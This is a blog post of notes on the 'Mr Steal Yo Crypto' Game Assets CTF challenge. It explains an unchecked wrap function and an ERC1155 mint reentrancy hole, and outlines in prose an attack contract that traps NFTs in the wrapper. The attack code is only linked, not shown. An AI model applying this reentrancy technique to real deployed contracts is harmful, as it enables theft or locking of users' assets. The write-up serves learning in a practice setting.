# Mr Steal Yo Crypto - Game Assets

By [Proxy](https://paragraph.com/@proxy-3) · 2024-01-26

---

### Disclaimer

This is not a walkthrough of every contract or code of the challenge. I am sharing my notes and resources I have used to complete this challenge, as well as some lessons I think are useful to take away after completing the challenge. I highly recommend you finish the challenge yourself first and only use this as additional content.

### Notes

*   `GameAsset` and `AssetHolder` seem like normal ERC721 and ERC1155 contracts
    
*   Looking at `AssetWrapper` contracts `wrap` function we see it immediately calls `_wrap` which mints an ERC1155 token to `assetOwner` parameter without any check that it is the owner of the ERC721 token, so anyone can mint the ERC1155.
    
*   Another major problem is the fact that `_wrap` calls ERC1155s `_mint` function which can be maliciously used via Reentrancy, because the `_mint` function calls an external function `onERC1155Received` to check that a contract can receive the ERC1155 token.
    
*   Wrapping tokens into ERC1155 can be dangerous because there are several functions from which we can reenter a contract if there is no `ReentrancyGuard` implemented
    
    *   The vulnerable ERC1155 functions are `safeTransferFrom()`, `safeBatchTransferFrom()`, `_mint()` and `_mintBatch()` (more on this in _Resources_ section).
        
    *   This is because all of these functions implement an external function call to `msg.sender` contract, calling the `onERC1155Received()` function, from where an attacker can reenter.
        

### Attack Contract

*   The attack contract needs to call `wrap` for the first NFT with `assetOwner = address(this)` and implement `onERC1155Received` to then again call `wrap` for the other NFT with the same `assetOwner` and then call `unwrap` on both NFTs to trap them in the wrapper contract
    

### Resources

*   [Challenge link](https://mrstealyocrypto.xyz/game-assets/index.html)
    
*   [Github contracts](https://github.com/0xToshii/mr-steal-yo-crypto-ctf-foundry/tree/implement/src/game-assets)
    
*   [Attack contract](https://github.com/Proxy1967/mr-steal-yo-crypto-ctf-foundry/blob/implement/test/AttackContracts/3-GameAssetsAttack.sol)
    
*   [Test file with solution](https://github.com/Proxy1967/mr-steal-yo-crypto-ctf-foundry/blob/implement/test/3-game-assets.sol)
    
*   [Where to find solidity reentrancy attacks (RareSkills)](https://www.rareskills.io/post/where-to-find-solidity-reentrancy-attacks)

---

*Originally published on [Proxy](https://paragraph.com/@proxy-3/mr-steal-yo-crypto-game-assets)*